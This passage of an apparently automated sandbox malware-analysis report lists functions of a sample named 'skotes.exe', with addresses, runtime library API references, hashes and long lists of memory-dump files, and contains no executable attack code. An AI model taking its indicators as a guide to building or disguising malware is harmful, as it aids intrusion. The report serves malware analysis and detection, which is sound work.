                                                                                                                                                                    • Opcode Fuzzy Hash: f148354f9281b8a2e26650bb727df1f1822a227f08efc01b74940033486b08c9
                                                                                                                                                                    • Instruction Fuzzy Hash: 0C210835B006159FCB14AB68D895AFD73ABBF96334B04012EE5118F3D1CBA4ED82CA94
                                                                                                                                                                    Function 0064DFE3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    • 6d, xrefs: 0064E034
                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 0064DFE8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 6d$C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                    • API String ID: 0-2760270080
                                                                                                                                                                    • Opcode ID: 5c6ac85c4406500f431e5cd85cb168176a39d85bab4a0f99f94c7122ae8b21d8
                                                                                                                                                                    • Instruction ID: 39831aff7806f8c7bfdee6c53708cc05f3a4c8a512e8662723301f6f80810789
                                                                                                                                                                    • Opcode Fuzzy Hash: 5c6ac85c4406500f431e5cd85cb168176a39d85bab4a0f99f94c7122ae8b21d8
                                                                                                                                                                    • Instruction Fuzzy Hash: 81219F71604209AF9B70AF65DC80EAB77AFFF107647104918F83897292EB62EC608760
                                                                                                                                                                    Function 0063AE65 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • List.LIBCONCRT ref: 0063AEEA
                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0063AF0F
                                                                                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0063AF4E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                                                                                                                                                                    • String ID: pExecutionResource
                                                                                                                                                                    • API String ID: 1772865662-359481074
                                                                                                                                                                    • Opcode ID: 3e66adb28062a56f06a7a3b75838a2de9ea1af2c6c58bd609972d48ff71a8397
                                                                                                                                                                    • Instruction ID: 3ea6d7984dd1f8471e2d8b339f98061be66f4ed87dbb7339b2338d853143a59a
                                                                                                                                                                    • Opcode Fuzzy Hash: 3e66adb28062a56f06a7a3b75838a2de9ea1af2c6c58bd609972d48ff71a8397
                                                                                                                                                                    • Instruction Fuzzy Hash: 6621E671A406159BCB48EF94C842BADB7B7BF48310F10802DF505AB382DBB0EE04DB95
                                                                                                                                                                    Function 00634EA2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00634F24
                                                                                                                                                                    • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00634F66
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
                                                                                                                                                                    • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                    • API String ID: 2663199487-3650809737
                                                                                                                                                                    • Opcode ID: d67c3d20cf2697fd704ea9645a00879c5e871ad0f2c340c6dfc0a6165fa1ff87
                                                                                                                                                                    • Instruction ID: df050d8ec662b8f599c8f62d5363491150452521421a8d5e8311872466783b04
                                                                                                                                                                    • Opcode Fuzzy Hash: d67c3d20cf2697fd704ea9645a00879c5e871ad0f2c340c6dfc0a6165fa1ff87
                                                                                                                                                                    • Instruction Fuzzy Hash: 6D21B034A00615AFCB44EF58D891EADB7B6BF48310F00406DF5069B691CF71AE01CB95
                                                                                                                                                                    Function 0063B975 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0063BA0E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
